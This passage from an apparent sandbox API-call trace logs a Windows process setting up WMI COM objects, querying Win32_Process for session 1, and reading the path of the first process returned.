Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e2b4 | out: ppvObject=0x38e2b4*=0x0) returned 0x80004002 [0211.093] WbemLocator:IUnknown:QueryInterface (in: This=0x55ed408, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e2c0 | out: ppvObject=0x38e2c0*=0x0) returned 0x80004002 [0211.093] CoGetContextToken (in: pToken=0x38e320 | out: pToken=0x38e320) returned 0x0 [0211.093] CoGetObjectContext (in: riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x55edbb4 | out: ppv=0x55edbb4*=0x6d0ca0) returned 0x0 [0211.093] CoGetContextToken (in: pToken=0x38e734 | out: pToken=0x38e734) returned 0x0 [0211.093] WbemLocator:IUnknown:QueryInterface (in: This=0x55ed408, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e7b4 | out: ppvObject=0x38e7b4*=0x0) returned 0x80004002 [0211.093] WbemLocator:IUnknown:Release (This=0x55ed408) returned 0x2 [0211.093] WbemLocator:IUnknown:Release (This=0x55ed408) returned 0x1 [0211.093] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0211.093] CoGetContextToken (in: pToken=0x38ed14 | out: pToken=0x38ed14) returned 0x0 [0211.094] WbemLocator:IUnknown:QueryInterface (in: This=0x55ed408, riid=0x38ede4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38ede0 | out: ppvObject=0x38ede0*=0x55ed408) returned 0x0 [0211.094] WbemLocator:IUnknown:AddRef (This=0x55ed408) returned 0x3 [0211.094] WbemLocator:IUnknown:Release (This=0x55ed408) returned 0x2 [0211.094] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38ef70 | out: puCount=0x38ef70*=0x2) returned 0x0 [0211.094] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=8, puBuffLength=0x38ef6c*=0x0, pszText=0x0 | out: puBuffLength=0x38ef6c*=0xf, pszText=0x0) returned 0x0 [0211.094] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=8, puBuffLength=0x38ef6c*=0xf, pszText="00000000000000" | out: puBuffLength=0x38ef6c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0211.094] CoCreateInstance (in: rclsid=0x6d5f3734*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6d5f3794*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x38ee1c | out: ppv=0x38ee1c*=0x55ed428) returned 0x0 [0211.094] WbemLocator:IWbemLocator:ConnectServer (in: This=0x55ed428, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x38eebc | out: ppNamespace=0x38eebc*=0x55aa830) returned 0x0 [0211.268] WbemLocator:IUnknown:QueryInterface (in: This=0x55aa830, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ed40 | out: ppvObject=0x38ed40*=0x55c4dac) returned 0x0 [0211.268] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x55c4dac, pProxy=0x55aa830, pAuthnSvc=0x38ed90, pAuthzSvc=0x38ed8c, pServerPrincName=0x38ed84, pAuthnLevel=0x38ed88, pImpLevel=0x38ed78, pAuthInfo=0x38ed7c, pCapabilites=0x38ed80 | out: pAuthnSvc=0x38ed90*=0xa, pAuthzSvc=0x38ed8c*=0x0, pServerPrincName=0x38ed84, pAuthnLevel=0x38ed88*=0x6, pImpLevel=0x38ed78*=0x2, pAuthInfo=0x38ed7c, pCapabilites=0x38ed80*=0x1) returned 0x0 [0211.268] WbemLocator:IUnknown:Release (This=0x55c4dac) returned 0x1 [0211.268] WbemLocator:IUnknown:QueryInterface (in: This=0x55aa830, riid=0x6d5f35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ed34 | out: ppvObject=0x38ed34*=0x55c4dcc) returned 0x0 [0211.268] WbemLocator:IUnknown:QueryInterface (in: This=0x55aa830, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ed20 | out: ppvObject=0x38ed20*=0x55c4dac) returned 0x0 [0211.268] WbemLocator:IClientSecurity:SetBlanket (This=0x55c4dac, pProxy=0x55aa830, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0211.269] WbemLocator:IUnknown:Release (This=0x55c4dac) returned 0x2 [0211.269] WbemLocator:IUnknown:Release (This=0x55c4dcc) returned 0x1 [0211.269] CoTaskMemFree (pv=0x55fea98) [0211.269] WbemLocator:IUnknown:AddRef (This=0x55aa830) returned 0x2 [0211.269] WbemLocator:IUnknown:Release (This=0x55ed428) returned 0x0 [0211.269] CoGetContextToken (in: pToken=0x38e274 | out: pToken=0x38e274) returned 0x0 [0211.270] CoGetContextToken (in: pToken=0x38e684 | out: pToken=0x38e684) returned 0x0 [0211.270] WbemLocator:IUnknown:QueryInterface (in: This=0x55aa830, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e620 | out: ppvObject=0x38e620*=0x55c4db4) returned 0x0 [0211.270] WbemLocator:IRpcOptions:Query (in: This=0x55c4db4, pPrx=0x55edb68, dwProperty=2, pdwValue=0x38e714 | out: pdwValue=0x38e714) returned 0x80004002 [0211.270] WbemLocator:IUnknown:Release (This=0x55c4db4) returned 0x2 [0211.270] CoGetContextToken (in: pToken=0x38ec54 | out: pToken=0x38ec54) returned 0x0 [0211.270] CoGetContextToken (in: pToken=0x38ebb4 | out: pToken=0x38ebb4) returned 0x0 [0211.270] WbemLocator:IUnknown:QueryInterface (in: This=0x55aa830, riid=0x38ec84*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x38eb50 | out: ppvObject=0x38eb50*=0x55aa830) returned 0x0 [0211.270] WbemLocator:IUnknown:Release (This=0x55aa830) returned 0x2 [0211.270] SysStringLen (param_1=0x0) returned 0x0 [0211.271] CoGetContextToken (in: pToken=0x38ed54 | out: pToken=0x38ed54) returned 0x0 [0211.271] IWbemServices:ExecQuery (in: This=0x55aa830, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Process Where SessionId='1'", lFlags=16, pCtx=0x0, ppEnum=0x38ef7c | out: ppEnum=0x38ef7c*=0x544efd0) returned 0x0 [0211.274] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38edb4 | out: ppvObject=0x38edb4*=0x544efd4) returned 0x0 [0211.274] IClientSecurity:QueryBlanket (in: This=0x544efd4, pProxy=0x544efd0, pAuthnSvc=0x38ee04, pAuthzSvc=0x38ee00, pServerPrincName=0x38edf8, pAuthnLevel=0x38edfc, pImpLevel=0x38edec, pAuthInfo=0x38edf0, pCapabilites=0x38edf4 | out: pAuthnSvc=0x38ee04*=0xa, pAuthzSvc=0x38ee00*=0x0, pServerPrincName=0x38edf8, pAuthnLevel=0x38edfc*=0x6, pImpLevel=0x38edec*=0x2, pAuthInfo=0x38edf0, pCapabilites=0x38edf4*=0x1) returned 0x0 [0211.274] IUnknown:Release (This=0x544efd4) returned 0x1 [0211.274] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x6d5f35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eda8 | out: ppvObject=0x38eda8*=0x55c4bec) returned 0x0 [0211.274] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ed94 | out: ppvObject=0x38ed94*=0x544efd4) returned 0x0 [0211.275] IClientSecurity:SetBlanket (This=0x544efd4, pProxy=0x544efd0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0211.276] IUnknown:Release (This=0x544efd4) returned 0x2 [0211.276] WbemLocator:IUnknown:Release (This=0x55c4bec) returned 0x1 [0211.277] CoTaskMemFree (pv=0x55feac8) [0211.277] IUnknown:AddRef (This=0x544efd0) returned 0x2 [0211.277] CoGetContextToken (in: pToken=0x38e2d4 | out: pToken=0x38e2d4) returned 0x0 [0211.277] CoGetContextToken (in: pToken=0x38e6e4 | out: pToken=0x38e6e4) returned 0x0 [0211.277] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e680 | out: ppvObject=0x38e680*=0x55c4bd4) returned 0x0 [0211.277] WbemLocator:IRpcOptions:Query (in: This=0x55c4bd4, pPrx=0x55edb50, dwProperty=2, pdwValue=0x38e774 | out: pdwValue=0x38e774) returned 0x80004002 [0211.278] WbemLocator:IUnknown:Release (This=0x55c4bd4) returned 0x2 [0211.278] CoGetContextToken (in: pToken=0x38ecb4 | out: pToken=0x38ecb4) returned 0x0 [0211.278] CoGetContextToken (in: pToken=0x38ec14 | out: pToken=0x38ec14) returned 0x0 [0211.278] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x38ece4*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x38ebb0 | out: ppvObject=0x38ebb0*=0x544efd0) returned 0x0 [0211.278] IUnknown:Release (This=0x544efd0) returned 0x2 [0211.278] SysStringLen (param_1=0x0) returned 0x0 [0211.278] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efc8 | out: puCount=0x38efc8*=0x2) returned 0x0 [0211.278] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc4*=0x0, pszText=0x0 | out: puBuffLength=0x38efc4*=0xf, pszText=0x0) returned 0x0 [0211.278] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc4*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0211.278] CoGetContextToken (in: pToken=0x38ee1c | out: pToken=0x38ee1c) returned 0x0 [0211.278] IEnumWbemClassObject:Clone (in: This=0x544efd0, ppEnum=0x38efd4 | out: ppEnum=0x38efd4*=0x544f098) returned 0x0 [0211.280] IUnknown:QueryInterface (in: This=0x544f098, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee90 | out: ppvObject=0x38ee90*=0x544f09c) returned 0x0 [0211.280] IClientSecurity:QueryBlanket (in: This=0x544f09c, pProxy=0x544f098, pAuthnSvc=0x38eee0, pAuthzSvc=0x38eedc, pServerPrincName=0x38eed4, pAuthnLevel=0x38eed8, pImpLevel=0x38eec8, pAuthInfo=0x38eecc, pCapabilites=0x38eed0 | out: pAuthnSvc=0x38eee0*=0xa, pAuthzSvc=0x38eedc*=0x0, pServerPrincName=0x38eed4, pAuthnLevel=0x38eed8*=0x6, pImpLevel=0x38eec8*=0x2, pAuthInfo=0x38eecc, pCapabilites=0x38eed0*=0x1) returned 0x0 [0211.280] IUnknown:Release (This=0x544f09c) returned 0x1 [0211.280] IUnknown:QueryInterface (in: This=0x544f098, riid=0x6d5f35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee84 | out: ppvObject=0x38ee84*=0x55c509c) returned 0x0 [0211.280] IUnknown:QueryInterface (in: This=0x544f098, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee70 | out: ppvObject=0x38ee70*=0x544f09c) returned 0x0 [0211.280] IClientSecurity:SetBlanket (This=0x544f09c, pProxy=0x544f098, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0211.282] IUnknown:Release (This=0x544f09c) returned 0x2 [0211.282] WbemLocator:IUnknown:Release (This=0x55c509c) returned 0x1 [0211.282] CoTaskMemFree (pv=0x55feaf8) [0211.282] IUnknown:AddRef (This=0x544f098) returned 0x2 [0211.283] CoGetContextToken (in: pToken=0x38e3a0 | out: pToken=0x38e3a0) returned 0x0 [0211.283] CoGetContextToken (in: pToken=0x38e7b4 | out: pToken=0x38e7b4) returned 0x0 [0211.283] IUnknown:QueryInterface (in: This=0x544f098, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e74c | out: ppvObject=0x38e74c*=0x55c5084) returned 0x0 [0211.283] WbemLocator:IRpcOptions:Query (in: This=0x55c5084, pPrx=0x55ee3f0, dwProperty=2, pdwValue=0x38e840 | out: pdwValue=0x38e840) returned 0x80004002 [0211.283] WbemLocator:IUnknown:Release (This=0x55c5084) returned 0x2 [0211.283] CoGetContextToken (in: pToken=0x38ed84 | out: pToken=0x38ed84) returned 0x0 [0211.283] CoGetContextToken (in: pToken=0x38ece4 | out: pToken=0x38ece4) returned 0x0 [0211.283] IUnknown:QueryInterface (in: This=0x544f098, riid=0x38edb4*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x38ec80 | out: ppvObject=0x38ec80*=0x544f098) returned 0x0 [0211.284] IUnknown:Release (This=0x544f098) returned 0x2 [0211.284] SysStringLen (param_1=0x0) returned 0x0 [0211.284] IEnumWbemClassObject:Reset (This=0x544f098) returned 0x0 [0211.285] CoTaskMemAlloc (cb=0x4) returned 0x56055e8 [0211.285] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x56055e8, puReturned=0x267acc0 | out: apObjects=0x56055e8*=0x53f69d0, puReturned=0x267acc0*=0x1) returned 0x0 [0212.417] IUnknown:QueryInterface (in: This=0x53f69d0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x53f69d0) returned 0x0 [0212.418] IUnknown:QueryInterface (in: This=0x53f69d0, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0212.418] IUnknown:QueryInterface (in: This=0x53f69d0, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0212.418] IUnknown:AddRef (This=0x53f69d0) returned 0x3 [0212.418] IUnknown:QueryInterface (in: This=0x53f69d0, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0212.418] IUnknown:QueryInterface (in: This=0x53f69d0, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0212.418] IUnknown:QueryInterface (in: This=0x53f69d0, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x53f69d4) returned 0x0 [0212.418] IMarshal:GetUnmarshalClass (in: This=0x53f69d4, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0212.419] IUnknown:Release (This=0x53f69d4) returned 0x3 [0212.419] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0212.419] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0212.419] IUnknown:QueryInterface (in: This=0x53f69d0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0212.419] IUnknown:Release (This=0x53f69d0) returned 0x2 [0212.419] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0212.419] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0212.419] IUnknown:QueryInterface (in: This=0x53f69d0, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x53f69d0) returned 0x0 [0212.419] IUnknown:AddRef (This=0x53f69d0) returned 0x4 [0212.419] IUnknown:Release (This=0x53f69d0) returned 0x3 [0212.419] IUnknown:Release (This=0x53f69d0) returned 0x2 [0212.419] CoTaskMemFree (pv=0x56055e8) [0212.419] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0212.419] IUnknown:AddRef (This=0x53f69d0) returned 0x3 [0212.420] IWbemClassObject:Get (in: This=0x53f69d0, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0212.420] IWbemClassObject:Get (in: This=0x53f69d0, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"380\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0212.420] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"380\"") returned 0x64 [0212.420] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"380\"") returned 0x64 [0212.421] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0212.421] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0212.421] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0212.421] IUnknown:Release (This=0x6d0cac) returned 0x1 [0212.422] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x56055e8) returned 0x0 [0212.423] WbemDefPath:IUnknown:QueryInterface (in: This=0x56055e8, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0212.423] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56055e8, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x53ac248) returned 0x0 [0212.423] WbemDefPath:IUnknown:Release (This=0x56055e8) returned 0x0 [0212.423] WbemDefPath:IUnknown:QueryInterface (in: This=0x53ac248, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x53ac248) returned 0x0 [0212.423] WbemDefPath:IUnknown:QueryInterface (in: This=0x53ac248, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0212.423] WbemDefPath:IUnknown:AddRef (This=0x53ac248) returned 0x3 [0212.423] WbemDefPath:IUnknown:QueryInterface (in: This=0x53ac248, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0212.423] WbemDefPath:IUnknown:QueryInterface (in: This=0x53ac248, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0212.423] WbemDefPath:IUnknown:QueryInterface (in: This=0x53ac248, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x5605608) returned 0x0 [0212.423] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5605608, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0212.424] WbemDefPath:IUnknown:Release (This=0x5605608) returned 0x3 [0212.424] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0212.424] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0212.424] WbemDefPath:IUnknown:QueryInterface (in: This=0x53ac248, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0212.424] WbemDefPath:IUnknown:Release (This=0x53ac248) returned 0x2 [0212.424] WbemDefPath:IUnknown:Release (This=0x53ac248) returned 0x1 [0212.424] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0212.424] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0212.424] WbemDefPath:IUnknown:QueryInterface (in: This=0x53ac248, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x53ac248) returned 0x0 [0212.424] WbemDefPath:IUnknown:AddRef (This=0x53ac248) returned 0x3 [0212.424] WbemDefPath:IUnknown:Release (This=0x53ac248) returned 0x2 [0212.424] WbemDefPath:IWbemPath:SetText (This=0x53ac248, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"380\"") returned 0x0 [0212.424] 